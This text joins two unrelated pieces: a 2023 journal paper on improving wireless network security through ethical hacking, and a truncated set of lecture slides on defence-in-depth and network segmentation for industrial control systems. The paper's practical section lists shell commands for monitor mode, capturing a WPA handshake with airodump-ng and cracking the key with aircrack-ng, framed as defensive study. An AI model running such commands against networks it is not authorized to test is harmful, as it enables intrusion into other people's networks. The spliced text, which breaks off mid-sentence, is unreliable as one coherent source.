CSS Master Draft

Journal of Modern Technology and Engineering
Vol.8, No.3, 2023, pp.207-219
ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL

HACKING: STRATEGIES AND BEST PRACTICES
ID
Salah Abdulghani Alabady1 , ID
Mohammed A. M. Abdullah2 ,
ID
Kaeed Ketab Kaeed1
1 Collegeof Engineering, Computer Engineering Department, University of Mosul, Iraq

2 Computer and Information Engineering Department, College of Electronics Engineering, Ninevah
University, Mosul, Iraq
Abstract. Wireless networks have experienced rapid expansion in recent years and are now one of the fastest-
growing industries in the telecommunications industry. Wireless communication technologies are popular due to
their advantages over wireline systems. The most significant advantage is the lack of cables, which permits the
three paradigms: communication everywhere, at any time, with anybody. However, the convenience of WLANs
brings greater security risks than security in the wired environment. Wireless communication data packets are in
the air and available to anyone who can intercept and decode them. So, the most significant source of risk in a
wireless network is that the technology underlying the communication medium, the airwave, is open to intruders.
This leads us to the idea of ethical hacking. Ethical hacking, often known as white-hat hacking, refers to the use
of hacking to test and strengthen defenses against unethical hackers. Ethical hacking employs the same tools and
tactics as unethical hacking, but it also requires substantial upfront planning, a set of specific tools, complicated
testing processes, and adequate follow-up to resolve any issues before unethical hacking exploits them. In this
paper, we aim to present various threats and vulnerabilities associated with 802.11-based wireless networks and
the possibility of ethical hacking to find the point of failure in trying to overcome these problems.
Keywords: Wireless Security, Ethical Hacking, IEEE 802.11, Performance Analysis

AMS Subject Classification: 68M15.
Corresponding author: Salah A., Alabady, College of Engineering, Computer Engineering Department, Uni-
versity of Mosul, Iraq, e-mail: [email protected]
Received: 12 February 2023; Revised: 18 July 2023; Accepted: 15 August 2023;
Published: 30 December 2023.
1 Introduction
Wireless networks have experienced rapid expansion in recent years and are now one of the
fastest-growing industries in the telecoms sector. Wireless local area networks, cellular, cord-
less, and satellite phones, as well as other wireless communication technologies, are now widely
used and regarded by many as indispensable tools for daily life. The benefits of wireless com-
munication systems over wired systems account for their growing popularity. The lack of cables,
which permits the three paradigms of communication-anywhere, anytime, with anyone-is the
main benefit.
It is important to note that current standards-based wireless LANs function at fast rates
Michael (2002). Typically, the speed ranges from 2 Mbps to over 54 Mbps. For a variety of
applications or services delivered via a PC or mobile device, this bandwidth is unquestionably
sufficient to provide an excellent user experience. Government organizations, individual con-
sumers, and commercial enterprises all utilize or are considering adopting wireless technologies.
207
JOURNAL OF MODERN TECHNOLOGY AND ENGINEERING, V.8, N.3, 2023
These organizations should be mindful of the security dangers connected to wireless technolo-
gies, though. As they integrate wireless technologies into their computer environments, agencies
must create measures to reduce hazards Gupta and Jha (2015), Alabady and Salleh (2013).
The main contribution of this paper is to present the main weaknesses of wireless and pro-
posed solutions and recommendations that can be taken to protect the wireless network. In this
context, a simple network is designed to simulate the practical situation as an eavesdropping
point. Sniffing software are tested under both Windows and Linux environment which indicated
the weakness of the old security protocol.
The remainder of this paper is organized as follows. In section 2, the background is explained,
section 3, we reviewed the related work. Section 4 describes the security characteristics of 802.11
wireless LANs. In Section 5, the practical work is evaluated and shows the results. Finally,
Section 6 presents the recommendations and conclusions remarks.
2 Background
Before diving into the details of wireless security, it is essential to know the wireless topology
and wireless standard protocols. These are going to be presented in the next sub-sections.
2.1 Wireless LANS Topology

In any wireless network, there are three topologies for wireless LANs:
• Infrastructure mode: A topology known as an infrastructure extends a wired LAN to

wireless devices by providing a base station (also known as an access point). The access
point serves as a central controller for the wireless LAN by bridging the wireless and wired
networks.
• Ad-hoc mode:In an ad-hoc topology, a LAN is built entirely by the wireless devices
themselves without the use of a central controller or access point. Instead of using a
centralized controller, each device connects directly with the other devices in the network.
• Mixed Network mode: Every wireless station can operate in both of the aforementioned
modes at once. The Extended Basic Service Set (EBSS) is another name for this Mao et al.
(2018) [4].
2.2 Wireless LAN Standard

• 802.11b: 802.11b was long recognized as the most extensively used Wi-Fi standard. It
makes use of frequencies between 2.400 and 2.485 GHz. The maximum 802.11b speed is
11 Mbps.
• 802.11g: The 802.11g protocol was approved in 2003 to match the 54-Mbps speed claims
of 802.11a. This protocol used the 2.4 GHz band of 802.11b and the OFDM modula-
tion method from 802.11a. It was able to maintain backward compatibility with 802.11b
equipment because it operated at 2.4 GHz.
• 802.11n: Since several years ago, the IEEE 802.11 Task Group n (TGn) has been develop-
ing a new wireless standard that will offer significantly more application data throughput
than current 802.11a/b/g wireless standards. Solutions built on the 802.11n standard will
support existing 802.11a/b/g deployments with a maximum data rate of 250 Mbps and
operate in the 2.4-GHz, 5-GHz, or both radio bands Bendale and Prasad (2018).
208
S.A. ALABADY et al. ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING...
• 802.11i: The Working Group of IEEE 802.11 has been working on MAC enhancement.
Task Group I (TGi) is working on security. It replaced the previous security rules by pro-
viding a Robust Security Network (RSN) with two new protocols: the group key handshake
and the four-way handshake. These employ the port access control and authentication ser-
vices mentioned in IEEE 802.1X to establish the appropriate cryptographic keys He et al.
(2019).
• 802.11ac: The fifth version of WiFi is known as 802.11ac or WiFi 5. It is an improvement

over IEEE 802.11n. In order to keep up with the increasing number of people, devices,
and data usage, WiFi 5 was intended to have faster speeds, WiFi performance, and better
range. 802.11ac has a theoretical maximum speed of 1,300 Mbps (1.3 Gbps) - 2,300 Mbps
(2.3 Gbps). The channel bandwidth of 802.11ac supported a maximum of 80 MHz.
• 802.11ax: The newest form of wireless technology is known as Wi-Fi 6. Compared to

Wi-Fi 5, Wi-Fi 6 offers more coverage, longer battery life, and better performance. Wi-Fi
6 was initially intended to alleviate bandwidth issues in crowded, high-traffic areas like
trains, stadiums, airports, and offices. 802.11ax radios can operate with both 2.4 GHz and
5 GHz frequency bands. Wi-Fi 6 by using multiple channels could have a maximum speed
of 9.6 Gbps.
3 Related work
The authors in Badholia et al. (2019) studied wireless network system (WNS) protocols i.e.
WEP, WAP, and WPA2. They proposed an improved version of mentioned protocols. They
based on algebraic, statistics, and logarithmic methods to build their new protocols. Results
indicate that the upgraded versions of WEP, WAP, and WAP2 operate more effectively and
securely. The authors of Faika et al. (2019) suggested using blockchain technology to protect
an IoT-enabled WBMS’s communication and data from harmful cyber-attacks. Their module is
strengthened by the findings of their experiments. Each of the five IoT Raspberry Pi 3 boards
has a smart contract installed on the Hyper-ledger Fabric blockchain platform. In contrast to
other blockchain platforms, they recommend using IBM’s Hyper-ledger Fabric, which will be
more relevant to IoT applications. Their findings offer the possibility of improving the cyber
security of WBMSs, which encourages the spread of Li-ion battery systems in cyber-physical
environments.
In order to determine wireless device authentication, Yun Lin and Jie Chang Lin and Chang
(2019) offer a radio frequency fingerprint extraction technique based on fractional Fourier trans-
form for transient signals. The findings demonstrate that this method’s recognition rate is very
near to 100% when the SNR is 20 dB. 10 Motorola walkie-talkies were also utilized to test the
effectiveness of the identifying procedure. The authors of Jilani et al. (2020) researched the risks
associated with wireless sensor networks. DoS attacks, black hole attacks, and wormhole attacks
were shown to be the most frequent dangers. They suggested a detection algorithm, equipped
to spot intrusions in advancing real-world circumstances.
Rajwinder Kaur and Jasminder Kaur Kaur and Sandhu (2021) presented the various secu-
rity measures that employ a machine learning (ML) strategy to counter intrusion attempts on
network data. They classify security assaults based on layer and kind and then use machine
learning to represent the appropriate response. The layer name and associated procedures are
listed in a schedule that was also created. Using open-source software and commercially acces-
sible hardware, the authors of Hoseini et al. (2022) created a physical layer security solution for
protecting wireless communications. This solution took advantage of the physical features of
the wireless channel. In order to manage and degrade the quality of the eavesdropper’s channel,
they practically manipulated the connectivity of the legitimate station using the flexibility and
control granularity offered by the relatively recent concept of spectrum programming.
209
Their success is attributed to the idea of spectrum programming, which is relatively new and
enables the centralization of the required measurements and controls. Haiwei Wu and Hanling
Wu Wu and Wu (2021) investigated the security issues in wireless sensor network applications
and investigated the mechanisms for protecting information security. They concluded that the
only way to accelerate the advancement of productive forces and information technology was
to grasp the science and technological development trend and work to remove its shortcom-
ings. The authors in Chen et al. (2021) proposed a new data processing method called Hex
Word2VecKMeans Smote (HWKS) to detect Abstract-Intrusion of wireless networks. They also
proposed an improved version of the Aegean WiFi Intrusion Dataset (AWID). They also boost
their suggestion with experimental results which show that, on the one hand, the HWKS method
is reasonable and new AWID is more effective and challenging; on the other hand, data sets sim-
ilar to AWID can be processed by the HWKS method, so the evaluation of different research
work will be consistent and comparable.
Wireless networks can be protected from potential threats by using the network security
monitoring system implemented by the authors in Maesaroh et al. (2022), which uses iptables
as an attack handler and Snort as a sensor engine. They discovered that the Intrusion Detection
System (IDS) system detects threats by examining a variety of sources and network traffic.
Additionally, they discovered that a computer network can only be monitored by a machine
or computer that functions as a sensor in the network and can witness all of the events that
take place in it. When using a Wireless Mobile network, the authors of Anitha et al. (2022)
hypothesize a reliable communication protocol with improved security handling capabilities.
The Novel Threat Management Scheme (NTMS) was the name given to their strategy. The
scientists developed their method by combining two various traditional methods, such as the
AODV and Data Hashing techniques. They combine to produce logic of security effectiveness,
data integrity level, access control capabilities, and bandwidth utilization level.
Wi-Fi-related network assaults were researched by Yuanyuan Liu Liu (2022). By studying
and evaluating network attack behaviors connected to Wi-Fi, he sought to identify and analyze
the preventative measures of wireless network security threats in order to enhance the security
of the wireless network. He examined real-world examples of wireless network threats before
putting out workable solutions. For cooperative virtual networks in the IoT era, the authors of
Alabady et al. (2020) presented a design of a typical network security paradigm. In addition to
a policy to reduce those risks, this article covers and explores network security vulnerabilities,
threats, attacks, and dangers in switches, firewalls, and routers. A network security model
using a static VLAN and a AAA server with the TACACS+ protocol is presented in the paper
Alabady (2008). The planning and execution of a network security framework using routers
and firewalls are presented in the paper Alabady (2009). Additionally, the paper examined the
network security flaws in router and firewall network devices, the different dangers and how to
counteract them, as well as how to stop attacks and hacker access to the network.
4 802.11 Wireless LAN Security Features

Network security is the procedure used to safeguard digital information assets. The protection
of confidentiality, upkeep of integrity, and guarantee of availability are the main goals of security
Patil et al. (2020). In 802.11 networks, there are three primary ways to prevent unauthorized
access to an AP:
1. Service set identifier (SSID): The use of an SSID connected to an AP or collection of

APs can be used to obtain control over network access. A wireless network can be divided
into different networks that are served by one or more APs using the SSID technique. Each
AP has an SSID pre-programmed that matches to a particular wireless network. This is
comparable to how wired LANs use the idea of a network address. The client’s computer
210
needs to be set up with the correct SSID in order to access a specific wireless network
Pamarthi and Narmadha (2022).
2. MAC Address Filtering: The 802.11 network card on a client computer has a specific
MAC address that can be used to identify it. To enhance AP access control, it is possible
to program each AP with a list of the MAC addresses of the client computers that are
permitted access. If a client’s MAC address is not included in this list, they are not allowed
to access the AP and their given SSID does not match the SSID of the AP Nazir et al.
(2021).
3. Wired Equivalent Privacy (WEP): The IEEE 802.11 WLAN specifications include
WEP. Its main goal is to guarantee data secrecy over wireless networks at a level compa-
rable to wired local area networks (LANs). Each data packet in WEP contains an integrity
check field that makes sure the data is not altered while being sent Zaman et al. (2021)
Jilani et al. (2020). For this, a CRC-32 checksum is utilized. The WEP protocol consists
of three parts: an initialization vector (IV) of 24 bits, a shared secret key (k 40 bits or
104 bits), and the RC4 algorithm (RC4 IV, k). A shared secret key (k 40bit / 104 bit)
makes use of the shared secret key to reduce the load on AP while also presuming that
the recipient of the secret key is a reliable individual. This shared key is never trans-
mitted wirelessly. The installation of this key on Work Stations is not covered by IEEE
802.11 specifications. Each WS/AP requires manual installation. The majority of APs
can manage four shared secret keys. A per-packet integer called the initialization vector is
transmitted unencrypted over the air. Since it is one of the inputs to the RC4 method, it
works best if it is produced randomly. IEEE 802.11 does not mention the IV generation. In
actuality, many cards produce IVs in a linear manner, that is, 1, 2, 3, etc. A key stream K
with a length equal to the message that will be delivered by the data-link layer is created
using the RC4 method. The IV and k are its inputs. Initialization Vectors are reused
with encrypted packets, the algorithm used to encrypt a WEP ’hash’ is not intended for
encryption purposes, and the most critical vulnerability is the widespread use of the WEP
key. These are only a few of WEP’s many weaknesses Butt et al. (2019).
4.1 Security Schemes in WLANs

Wi-Fi Protected Access (WPA), Wired Equivalent Privacy (WEP), Wi-Fi Protected Access 2
(WPA2), and Wi-Fi Protected Access 3 (WPA3) are the last and most reliable security methods
for WLAN technology. These four security schemes have been implemented for IEEE 802.11
standards. WPA2 security scheme presents a notable improvement compared to WPA and
WEP due to using counter mode cipher block chaining message authentication code protocol
(CCMP) based on advanced encryption standard (AES) block cipher instead of Rivest cipher 4
(RC4) stream cipher. However, WPA2 uses a pre-shared key (PSK), if an adversary gets access
to the shared key. Then, he or she exploits the key to implement an attack (by decrypting
the traffic). WPA3 solves this problem using the Simultaneous Authentication of Equal (SAE)
handshaking (secure key establishment protocol) which is called Dragonfly handshaking. SAE
deals with password based-authentication rather than the PSK technique. Moreover, WPA3
exploits the latest security methods and it employs mandatory protected management frames
(PMF) mechanisms to secure the management frames.
In the case of WPA3, it is likely difficult for an adversary to steal the wireless traffic of the
clients who are protected by WPA3. Even if an attacker has successfully guessed a client’s pass-
word, he cannot get the session keys used for encryption and decryption. It is worth mentioning
that, this thesis concentrates on the WPA3 security scheme because this scheme compensates
for the issues that were introduced in the previous security schemes in WLANs.
211
4.2 Ciphering Module of WPA3

WPA3 is a subset and the latest improvement of the 802.11i security standard of WLAN technol-
ogy for personal and enterprise networks. WPA3 enhances the encryption of wireless networks
using a new encryption protocol called Galois Counter Mode Protocol (GCMP) with Advanced
Encryption Standard (AES) Ahmad et al. (2018). In addition, WPA3 improves the authentica-
tion of wireless networks by dealing with Simultaneous Authentication of Equal (SAE is defined
as a secure key establishment protocol) with a length key equal to 128 or 192 bits to submit
stronger defences against password guessing where WPA2 was dealt with pre-shared key (PSK).
Further, WPA3 deals with GCMP and the secure hash algorithm (HMAC-SHA 384) Lamers
et al. (2021). Therefore, WPA3 offers encryption (Elliptical Curve Cryptography with 192-bit
security suite), authentication (SAE), and data integrity (Secure hash algorithm: SHA-1 or
SHA-2).
WPA3 supports multi-operation modes where the best mode that addresses the design of
the substation network is a WPA3 enterprise mode because this mode is specialized to the in-
dustry environment and it enforces robust secret security standards compared to other secret
security standards Wang et al. (2020), Baray and Ojha (2021). Opportunistic Wireless En-
cryption (OWE), when used in enterprise mode, encrypts wireless client interactions with AP
conversations using a different key for each connection. Every wireless connection has unique
encryption. It employs a Protected Management Frame (PMF) mandatory to support the pro-
tection of management frames between APs and wireless clients.
4.3 Wireless Network Security Threats

Wireless networks due to their broadcast nature the risk of interception is greater than with
wired networks. Here are some of the major threats to a wireless network Kamrul et al. (2022):
1. Sniffing to Eavesdrop: due to the wireless communication broadcast nature over radio
waves, eavesdroppers can easily pick up unencrypted messages, which means reaching for
sensitive network information.
2. Denial of service attacks (DoS): in this type, network attackers flood the network with
a lot of the number of requests so that the network could not handle all these requests
which leads to a network crash.
3. Rogue Access Points: It is a technique for building an unsecure access point inside the
firewall in order to open a back door into the trusted network.
4. Network Abuses: Authorized users are also able to compromise the security of the
network by abusing it by using bandwidth, slowing down connections, and obstructing a
WLAN’s overall performance.
5. Brute-Force Attack:This type of attack uses the method ”Trial and error” by guessing
passwords. An attacker first gathers the fundamental information about the user. For
example, user’s full name, room number, vehicle number, children names etc. The attacker
continuously tries random passwords on the basis of the user’s personal information. The
attacker tries this until he/she gets success. This may take hours, days, months and years
also.
5 Practical Work
In this work, ethical hacking is intended to understand the security bugs of IEEE 802.11.
212
5.1 Under Windows

Types of equipment used are Wlan Adapter (3com with Atheros chipsets), Personal Computer
(P4), Laptop (p4), and Access Point (D-Link, Micronet, Cisco). Wireless scanning programs like
Netstumbler, Aire1.0 and CommView are also needed for scanning and hacking WIFI signals.
Netstumbler is used for finding AP information like the MAC Address of AP, SSID, the channel
of WLAN, and the SNR of WLAN as shown in Figure 1. Here we mention that if disabling
SSID Broadcast choice is taped in Cisco AP settings, the netstumbler program could not find
the AP signal. So we used the Commview program to find the WIFI signal.
Figure 1: Output of NetStumbelr
Commview give more options than Netstumblerlike capture packet, statistics view of how
station and AP connect with each other, packet transferred, and other options as shown in
Figures 2 and 3.
Figure 2: CommView for WiFi
Atheros Driver is used to make the WLAN adapter enter Monitor Mode under Windows.
Figure 4 shows the installation of the Atheros driver. With D-Link (DWL-2000AP) we made a
simple network to try to access it. Then by using AiroWizard 1.0 with the options Aircracki-
ng and Airodumbi-ng enough data (more than 10000IVs) will be collected, after that with the
Aircrack option AP key should be found. The AP key will be in ASCII code. Figure 5 shows a
capture of the AiroWizard 1.0 program with AP key found.
213
Figure 3: Statistics view of how station and AP connect with each other
Figure 4: Wireless network adapter installation
5.2 Under Linux

Linux (backtrack v2) is used for getting the AP key, which is a live CD mean that starts
automatically without installing only boot from it. This version provides a wide spectrum of
the hacking program already installed in it. Cracking WPA is different than WEP crack it
does not depend on collecting packets but instead depends on Handshaking signal. You can
either actively or passively achieve this. ”Actively” means the de-authenticating process will
be accelerated such that there is an existing wireless client. ”Passively” Passively refers to the
214
Figure 5: AiroWizard Capture with AP Key founded
act of patiently awaiting a wireless client’s WPA network authentication. To enter the WLAN
adapter in Monitor mode below commands are used
# Wlanconfig ath0 create wlandev wifi0 wlanmode monitor
# ifconfig aht0 up
For finding wireless APs the following command is used
# iwlist ath0 scan
Figure 6 shows the results of the scanning for WLAN networks
Figure 6: Scanning for WLAN Networks
Then for Starting airodump-ng to collect authentication handshake, we used the command
# airodump-ng -c 2 –bssid 00:11:95:3C:2A:36 -w work ath0
215
The purpose of this step is to capture the 4-way authentication handshake for the AP we
are interested in. Now to find the AP key we used the command
# aircrack-ng -w 1.lst work-01.cap
Figure 7 shows the capture of backtrack V2 after finding the AP key
Figure 7: Capture of Back Track V2 after Finding the AP Key
6 Recommendations and Conclusions Remarks

Although some wireless protocols have major security issues, some methods may be performed
to secure the wireless networks, which are listed below:
1. Enable WPA encryption instead of WEP: Weaknesses in the 802.11 WEP (Wired
Equivalency Privacy) encryption make it very simple for a determined user with the correct
tools to break the encryption and access the wireless network. WPA (Wi-Fi Protected
Access) is a superior method of WLAN security. Since WPA doesn’t restrict your password
characters to 0-9 and A-F like WEP does, it offers far better security and is simpler to
use. A more recent version, WPA3, is found in newer hardware and provides even stronger
encryption.
2. Using a strong encryption protocol: Using a recent encryption protocol such as

WPA 3 is recommended because employing the old protocol such as WEP and WPA 1 is
vulnerable to attacks as was demonstrated in the practical part of this work.
3. Change the Administrator Password: Devices which serve as wireless access points
often come with a default password. Many manufacturers’ default passwords are well
known and can be utilized to log into a network without permission. Therefore, change
216
the administrator password to be at least 8 characters with special symbols (such as #, $,

and &). Also, avoid using personal information such as the birth date.
4. Keep the Access Point Software Up to Date: The maker of the wireless access
point sometimes offers software updates for the device to fix faults. It is highly advised to
frequently check the manufacturer’s website for any software updates for the device.
5. Reduce RF power transmission to the minimal level necessary: A common mea-

sure used to prevent an attack is turning the power down on the AP (if an internal WLAN
network is used). By turning the power down, the range of the AP signal is reduced and
hence reduces the probability of an outsider attack.
6. Use directional antennas: The propagation of RF signals can be difficult to control

and frequently isn’t practicable. Usually, the RF energy will spread outside the stations’
operating range. Using directional antennas on the access points is an additional security
measure in addition to power-limiting transmission levels. The majority of access points
ship standard with omnidirectional antennas, which spherically emit the RF signal with
equal power in all directions. To stop RF signals from spreading, directional antennas can
direct the energy in that direction.
7. MAC filtering: When this low-level security control is implemented on the access point,
only stations with specific MAC addresses will be able to connect with the access point.
By doing so, unauthorized access will be reduced.
8. Changing the encryption keys regularly: In order to prevent a compromised network

from continuing to be compromised indefinitely, encryption keys should be changed. Even
while there’s always a chance that a hacker may be able to crack the encryption key a
second time, changing keys gives them a little less incentive.
9. Disable Beacon Packets: Some APs have a setting that prohibits the AP from period-
ically broadcasting beacon packets to announce its presence. Before responding to traffic,
these APs demand that wireless network cards utilize the same SSID. This feature stops
some WLAN scanning programs from being used by hackers.
References
Ahmad, N., Wei, L. M., and Jabbar, M. H. (2018). Advanced encryption standard with galois
counter mode using field programmable gate array. In Journal of Physics: Conference Series,
volume 1019, page 012008. IOP Publishing.
Alabady, S. A. (2008). Design and implementation of a network security model using static vlan
and aaa server. In 3rd IEEE International Conference on Information and Communication
Technologies: From Theory to Applications, 2008. ICTTA 2008., pages 1–6.
Alabady, S. A. (2009). Design and implementation of a network security model for cooperative
network. International Arab Journal of e-Technology, 1(2):26–36.
Alabady, S. A., Al-Turjman, F., and Din, S. (2020). A novel security model for cooperative
virtual networks in the iot era. International Journal of Parallel Programming, 48(2):280–
295.
Alabady, S. A. and Salleh, M. (2013). Overview of wireless mesh networks. Journal of Commu-
nications, 8(9):134–144.
217
Anitha, G., Nirmala, P., Ramesh, S., Tamilselvi, M., and Ramkumar, G. (2022). A novel data
communication with security enhancement using threat management scheme over wireless mo-
bile networks. In IEEE International Conference on Advances in Computing, Communication
and Applied Informatics (ACCAI), pages 1–6.
Badholia, A., Verma, V., and Kashyap, S. K. (2019). Wep, wap and wap2 wireless network
security protocol: A compact algorithm:(wireless network security protocol). In IEEE In-
ternational Conference on Computing, Communication, and Intelligent Systems (ICCCIS),
pages 239–243.
Baray, E. and Ojha, N. K. (2021). Wlan security protocols and wpa3 security approach mea-
surement through aircrack-ng technique. In 5th IEEE International Conference on Computing
Methodologies and Communication (ICCMC), pages 23–30.
Bendale, S. P. and Prasad, J. R. (2018). Security threats and challenges in future mobile wireless
networks. In IEEE Global Conference on Wireless Computing and Networking (GCWCN),
pages 146–150.
Butt, S. A., Diaz-Martinez, J. L., Jamal, T., Ali, A., De-La-Hoz-Franco, E., and Shoaib, M.
(2019). Iot smart health security threats. In 19th IEEE International conference on compu-
tational science and its applications (ICCSA), pages 26–31.
Chen, J., Yang, T., He, B., and He, L. (2021). An analysis and research on wireless network
security dataset. In IEEE International Conference on Big Data Analysis and Computer
Science (BDACS), pages 80–83.
Faika, T., Kim, T., Ochoa, J., Khan, M., Park, S.-W., and Leung, C. S. (2019). A blockchain-
based internet of things (iot) network for security-enhanced wireless battery management
systems. In IEEE industry applications society annual meeting, pages 1–6.
Gupta, A. and Jha, R. K. (2015). Security threats of wireless networks: A survey. In IEEE
International Conference on Computing, Communication and Automation, pages 389–395.
He, D., Li, X., Chan, S., Gao, J., and Guizani, M. (2019). Security analysis of a space-based
wireless network. IEEE Network, 33(1):36–43.
Hoseini, S. A., Bouhafs, F., and den Hartog, F. (2022). A practical implementation of physical
layer security in wireless networks. In IEEE 19th Annual Consumer Communications and
Networking Conference (CCNC), pages 1–4.
Jilani, S. A., Koner, C., and Nandi, S. (2020). Security in wireless sensor networks: attacks
and evasion. In IEEE National conference on emerging trends on sustainable technology and
engineering applications (NCETSTEA), pages 1–5.
Kamrul, H. M., Ghazal, T. M., Saeed, R. A., Pandey, B., Gohel, H., Eshmawi, A., Abdel-Khalek,
S., and Alkhassawneh, H. M. (2022). A review on security threats, vulnerabilities, and counter
measures of 5g enabled internet-of-medical-things. IET Communications, 16(5):421–432.
Kaur, R. and Sandhu, J. K. (2021). A study on security attacks in wireless sensor network.
In IEEE International conference on advance computing and innovative technologies in engi-
neering (ICACITE), pages 850–855.
Lamers, E., Dijksman, R., van der Vegt, A., Sarode, M., and de Laat, C. (2021). Securing home
wi-fi with wpa3 personal. In IEEE 18th Annual Consumer Communications and Networking
Conference (CCNC), pages 1–8.
218
Lin, Y. and Chang, J. (2019). Improving wireless network security based on radio fingerprint-
ing. In IEEE 19th International Conference on Software Quality, Reliability and Security
Companion (QRS-C), pages 375–379.
Liu, Y. (2022). Security in wireless networks: Analysis of wi-fi security and attack cases study. In
IEEE International Conference on Artificial Intelligence in Everything (AIE), pages 476–481.
Maesaroh, S., Kusumaningrum, L., Sintawana, N., Lazirkha, D. P., and Dinda, R. (2022).
Wireless network security design and analysis using wireless intrusion detection system. In-
ternational Journal of Cyber and IT Service Management, 2(1):30–39.
Mao, Q., Hu, F., and Hao, Q. (2018). Deep learning for intelligent wireless networks: A com-
prehensive survey. IEEE Communications Surveys and Tutorials, 20(4):2595–2621.
Michael, S. (2002). Hacking the invisible network insecurities in 802.11 x. iAlert White paper,
pages 1–35.
Nazir, R., Laghari, A. A., Kumar, K., David, S., and Ali, M. (2021). Survey on wireless network
security. Archives of Computational Methods in Engineering, pages 1–20.
Pamarthi, S. and Narmadha, R. (2022). Literature review on network security in wireless mobile
ad-hoc network for iot applications: Network attacks and detection mechanisms. International
Journal of Intelligent Unmanned Systems, 10(4):482–506.
Patil, B., Kharade, K., and Kamat, R. (2020). Investigation on data security threats and
solutions. International Journal of Innovative Science and Research Technology, 5(1):79–83.
Wang, L., Yang, J., and Wan, P.-J. (2020). Educational modules and research surveys on critical
cybersecurity topics. International Journal of Distributed Sensor Networks, 16(9):1–18.
Wu, H. and Wu, H. (2021). Research on computer network information security problems and
prevention based on wireless sensor network. In IEEE Asia-Pacific Conference on Image
Processing, Electronics and Computers (IPEC), pages 1015–1018.
Zaman, S., Alhazmi, K., Aseeri, M. A., Ahmed, M. R., Khan, R. T., Kaiser, M. S., and Mahmud,
M. (2021). Security threats and artificial intelligence based countermeasures for internet of
things networks: a comprehensive survey. IEEE Access, 9:94668–94690.
219
UFCF7P-15-M Critical Systems Security
UFCF7P-15-M CRITICAL
SYSTEMS SECURITY
Defence-in-depth
1
RECAP
2
Intelligence-driven computer network defence
• Kill chain model – the basis of intelligence-driven computer network

defence
• Kill chain analysis illustrates that the adversary must progress

successfully through each stage of the chain before it can achieve
its desired objective; just one mitigation disrupts the chain and the
adversary [1].
• Objectives:
– Identify phases of intrusion.
– Map adversary kill chain indicators to defender courses of action.
– Identify patterns that link individual intrusions into broader campaigns.
– Understand the iterative nature of intelligence.
3
Indicators and the indicator life cycle

• The fundamental element of intelligence in the Cyber Kill Chain model
is the indicator; any piece of information that objectively describes
an intrusion.
• Three indicator types:

– Atomic
– Computed
– Behavioural
4
Atomic indicators
• Atomic indicators are those which cannot be broken down into
smaller parts and retain their meaning in the context of an intrusion.
• Typical examples here are IP addresses, email addresses and
vulnerability identifiers.
[email protected]
8.1 .5
192.16 CVE-1999-0067
More on CVE: https://cve.mitre.org/
5
Computed indicators
• Computed indicators are those which are derived from data involved
in an incident.
• Common computed indicators include hash values and regular

expressions.
6
Behavioural indicators
• Behavioural indicators are collections of computed and atomic
indicators, often subject to qualification by quantity and possibly
combinatorial logic.
•Example:
•“the intruder would initially use a backdoor which generated network

traffic matching [regular expression] at the rate of [some frequency]
to [some IP address], and then replace it with one matching the [MD5
hash value] once access was established”
7
ICS Cyber kill chain model: Stage 1
8
9
This week
• ICS Security Architecture

• Network segmentation
• Boundary protection
• Firewalls
• Network segregation
• Defence-in-depth
• ISA/IEC 62443-3-2
• In the tutorial
10
ICS Security Architecture
• Separate corporate network from ICS network
• If the networks must be connected, only minimal (single if possible)

connections be allowed and that the connection is through a firewall
and a DMZ.
11
Network segmentation and segregation
• Operational risk analysis should be performed to determine critical

parts of the ICS network and define segmentation (partitioning the
network into smaller networks).
• Segmentation establishes security domains typically defined as

being managed by the same authority, enforcing the same policy,
and having a uniform level of trust.
• Goal: Minimise access to sensitive information, ICS communication

and equipment configuration.
12

• Traditionally, network segmentation and segregation is implemented at
the gateway between domains.
corporate LANs
control LANs
Internet
operational LANs
operational DMZs
13

Common technologies and methods:
• Logical network separation enforced by encryption or network

device-enforced partitioning (VLANs, VPNs, unidirectional gateways)
• Physical network separation to completely prevent any

interconnectivity of traffic between domains.
• Network traffic filtering use a variety of technologies at various

network layers to enforce security requirements and domains (e.g.
filtering based on IP, port and/or protocol or at the application layer).
14
Defence in depth
• Deploy multiple layers of protection
• Redundancy in case a security measure fails
• Make the attacker’s life difficult!
15
Network segmentation and segregation - Defence in

depth
Four common themes that implement the concept of defense-in-depth

by providing for good network segmentation and segregation:
1) Apply technologies at more than just the network layer.
2) Use the principles of least privilege and need‐to‐know.
3) Separate information and infrastructure based on security

requirements.
4) Implement whitelisting instead of blacklisting.
16
Boundary protection (data transactions between

network segments)
Control the flow of information between interconnected security

domains.
Boundary protection controls include: gateways, routers, firewalls,

DMZs, network-based malicious code analysis and virtualisation
systems, intrusion detection systems (network and host-based),
encrypted tunnels, managed interfaces, mail gateways, and
unidirectional gateways (e.g. data diodes).
Boundary protection devices determine whether data transfer is

permitted, often by examining the data or associated metadata.
17

network segments)
• Common architectural construct is the DMZs; a host or network

segment inserted as a “neutral zone” between security domains.
• Denying communications traffic by default and allowing

communications traffic by exception (white-listing policy)
• Limit direct connectivity by implementing proxy servers that act as an

intermediary for external domains’ requesting information system
resources (e.g., files, connections, or services) from the ICS domain.
• Deep packet inspection firewalls and XML gateways.
18

network segments)
• Allow communication only between authorised and authenticated

source and destinations address pairs
• Extending the DMZ concept to other separate subnetworks is useful,

for instance isolating ICS to prevent adversaries from discovering
the analysis and forensics techniques of organisations.
• Enforce physical access control to limit authorised access to ICS

components
• Conceal network addresses of ICS components from discovery

(e.g., network address not published or entered in domain name
systems), requiring prior knowledge for access.
19

network segments)
• Disable control and troubleshooting services and protocols,

especially those employing broadcast messaging, which can facilitate
network exploration.
• Disable feedback (e.g., non-verbose mode) to senders when there is

a failure in protocol validation format to prevent adversaries from
obtaining information.
• Implement one-way data flow, especially between different security

domains.
• Establishing passive monitoring of ICS networks to actively detect

anomalous communications and provide alerts.
20

network segments)
Network and ICS security architects must decide:
• which domains are to be permitted direct communication,

• the policies governing permitted communication,
• the devices to be used to enforce the policy, and
• the topology for provisioning and implementing these decisions,
which are typically based on the trust relationship between domains.
21
Firewalls
• Not just for the connection to the Internet.
• Restrict ICS inter-subnetwork communications; prevent

unauthorised access to the respective systems and resources within
the more sensitive areas.
Types of Firewalls:
- Packet Filtering Firewalls
- Stateful Inspection Firewalls
- Application-Proxy Gateway Firewalls
22
Firewalls

the more sensitive areas
Types of Firewalls:
23
Firewalls

Types of Firewalls:
24
Firewalls

Types of Firewalls:
25
Network segregation
26
Network segregation
Dual-Homed Computer/Dual Network Interface Cards (NIC)
• No systems other than firewalls should be configured as dual-

